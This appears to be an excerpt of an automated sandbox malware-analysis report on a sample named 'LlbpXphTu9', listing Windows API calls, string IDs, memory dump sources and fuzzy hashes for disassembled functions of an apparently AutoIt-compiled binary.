                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 132634196-0
                                                                                                                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                                                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                                                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                                                                                                            APIs
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                                                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                                                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                                                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3798957060-0
                                                                                                                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                                                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                                                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                                                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                                                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                                                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                                                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                                                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                                                                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1537469427-0
                                                                                                                                                                            • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                            • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                                                                                                            • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                                                                                                            • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _malloc
                                                                                                                                                                            • String ID: Default$|k
                                                                                                                                                                            • API String ID: 1579825452-2254895183
                                                                                                                                                                            • Opcode ID: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                                                                            • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                                                                            • Opcode Fuzzy Hash: 3487a4ebd3b6326aef9d7885c20b94cf9b3333ebd549fd878091b2165ba8d13b
                                                                                                                                                                            • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                            • String ID: '$[$h
                                                                                                                                                                            • API String ID: 2931989736-1224472061
                                                                                                                                                                            • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                            • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                                                                                                            • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                                                                                                            • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                            • String ID: >$R$U
                                                                                                                                                                            • API String ID: 909875538-1924298640
                                                                                                                                                                            • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                            • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                                                                                                            • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                                                                                                            • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                            • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                            • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                                                                            • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                                                                            • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                                                                            Strings
                                                                                                                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                            • API String ID: 176396367-557222456
                                                                                                                                                                            • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                            • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                                                            • String ID: 4RH
                                                                                                                                                                            • API String ID: 2981388473-749298218
                                                                                                                                                                            • Opcode ID: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                                                                            • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                                                                            • Opcode Fuzzy Hash: 4feaa528d6096a3eb4cb9403f6e39e38e90fdea1ed4b6218c2cb6dc4c25be61b
                                                                                                                                                                            • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                            • String ID: LPT$HH
                                                                                                                                                                            • API String ID: 3035604524-2728063697
                                                                                                                                                                            • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                                                                            • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                                                                                                            • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                                                                                                                            • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                                                              • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 4055202900-2766056989
                                                                                                                                                                            • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                            • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                                                                            • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                                                                            • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CrackInternet_memset_wcslen
                                                                                                                                                                            • String ID: |
                                                                                                                                                                            • API String ID: 915713708-2343686810
                                                                                                                                                                            • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                            • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                                                                                                            • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3705125965-3916222277
                                                                                                                                                                            • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                            • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                                                                                                            • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                                                                                                            • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                            • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                            • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                                                                                                            • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                                                                                                            • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                            • String ID: AU3_GetPluginDetails
                                                                                                                                                                            • API String ID: 145871493-4132174516
